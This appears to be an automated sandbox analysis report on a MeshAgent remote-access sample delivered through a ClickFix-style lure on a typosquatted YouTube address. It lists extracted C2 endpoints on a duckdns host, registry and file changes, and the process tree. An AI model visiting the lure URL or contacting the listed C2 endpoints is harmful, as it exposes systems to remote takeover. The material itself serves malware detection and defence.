Resubmissions
09/04/2025, 17:31
250409-v3wdfaxycw 1009/04/2025, 17:30
250409-v264jsxpz2 809/04/2025, 17:26
250409-vzvbzaxpt8 4Analysis
-
max time kernel
33s -
max time network
35s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
09/04/2025, 17:31
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
meshagent
2
clickfix
http://aaso12.duckdns.org:443/agent.ashx
-
mesh_id
0x950AE7E094D02F632FBC73D5C2419AAC81F9563B8A37915670D8453B94FB3DA11961008E153469470F365ACD78AB3512
-
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
-
wss
wss://aaso12.duckdns.org:443/agent.ashx
Signatures
-
Detects MeshAgent payload 2 IoCs
resource yara_rule behavioral1/files/0x00080000000243c6-487.dat family_meshagent behavioral1/memory/384-491-0x00007FF6FA2E0000-0x00007FF6FA655000-memory.dmp family_meshagent -
Meshagent family
-
pid Process 6084 powershell.exe 5352 PowerShell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" " s.exe -
Executes dropped EXE 1 IoCs
pid Process 5836 MeshAgent.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\System32\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\bcryptprimitives.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\ws2_32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\msvcrt.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\gdi32full.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\gdiplus.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\ncrypt.pdb s.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\ntdll.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\kernel32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\gdi32.pdb s.exe File opened for modification C:\Windows\System32\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\rpcrt4.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\DLL\bcrypt.pdb s.exe File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\dbghelp.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\dll\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\apphelp.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\msvcp_win.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\DLL\bcrypt.pdb s.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ncrypt.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\2DD581208958C3B4EC8C44713386777F58F21474 MeshAgent.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\gdi32full.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\sechost.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\ncrypt.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\ntasn1.pdb s.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\comctl32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\user32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\Kernel.Appcore.pdb s.exe File opened for modification C:\Windows\System32\DLL\kernel32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\user32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\ws2_32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\advapi32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\advapi32.pdb s.exe File opened for modification C:\Windows\System32\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\user32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\apphelp.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\ws2_32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\comctl32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\crypt32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\win32u.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\iphlpapi.pdb s.exe File opened for modification C:\Windows\System32\dll\user32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\gdi32.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\win32u.pdb s.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\ole32.pdb s.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\fi\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\pl\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\et\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\zh_HK\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\sw\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\es\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\ja\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\zh_TW\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\gl\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\en_CA\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\manifest.fingerprint msedge.exe File created C:\Program Files\Mesh Agent\MeshAgent.msh MeshAgent.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\el\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\mn\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\ur\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\fa\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\hr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\id\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\am\messages.json msedge.exe File created C:\Program Files\Mesh Agent\MeshAgent.exe s.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\page_embed_script.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\pt_PT\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\es_419\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\hu\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\tr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\ar\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\en_GB\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\hy\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\dasherSettingSchema.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\ml\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\it\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\vi\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\iw\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\fr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\128.png msedge.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\msedge_url_fetcher_5308_619120614\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_90_1_0.crx msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\uk\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\da\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\si\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\is\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\pa\messages.json msedge.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\fr_CA\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\mr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\km\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\th\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\de\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\zh_CN\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\en_US\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\sv\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\offscreendocument_main.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\cs\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\cy\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\hi\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\ru\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\zu\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\sk\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\ko\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\eu\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\ta\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\ne\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_locales\gu\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping5308_689650082\_metadata\verified_contents.json msedge.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 49 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133886934922837980" msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-308834014-1004923324-1191300197-1000\{0FEBD9B3-6C6B-4246-9B60-48095601659C} msedge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 5352 PowerShell.exe 5352 PowerShell.exe 5352 PowerShell.exe 6084 powershell.exe 6084 powershell.exe 6084 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 5308 msedge.exe 5308 msedge.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5352 PowerShell.exe Token: SeDebugPrivilege 6084 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5308 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5308 wrote to memory of 2692 5308 msedge.exe 87 PID 5308 wrote to memory of 2692 5308 msedge.exe 87 PID 5308 wrote to memory of 5804 5308 msedge.exe 88 PID 5308 wrote to memory of 5804 5308 msedge.exe 88 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 1444 5308 msedge.exe 89 PID 5308 wrote to memory of 3276 5308 msedge.exe 90 PID 5308 wrote to memory of 3276 5308 msedge.exe 90 PID 5308 wrote to memory of 3276 5308 msedge.exe 90 PID 5308 wrote to memory of 3276 5308 msedge.exe 90 PID 5308 wrote to memory of 3276 5308 msedge.exe 90 PID 5308 wrote to memory of 3276 5308 msedge.exe 90 PID 5308 wrote to memory of 3276 5308 msedge.exe 90 PID 5308 wrote to memory of 3276 5308 msedge.exe 90 PID 5308 wrote to memory of 3276 5308 msedge.exe 90
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtude.net/watch?v=i50wel2lVsw1⤵
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5308 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2ec,0x7ffb7dfef208,0x7ffb7dfef214,0x7ffb7dfef2202⤵PID:2692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1932,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:32⤵PID:5804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2248,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:22⤵PID:1444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2548,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:82⤵PID:3276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:12⤵PID:4680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:12⤵PID:4688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5020,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:82⤵PID:5932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4992,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:82⤵PID:4312
-
-
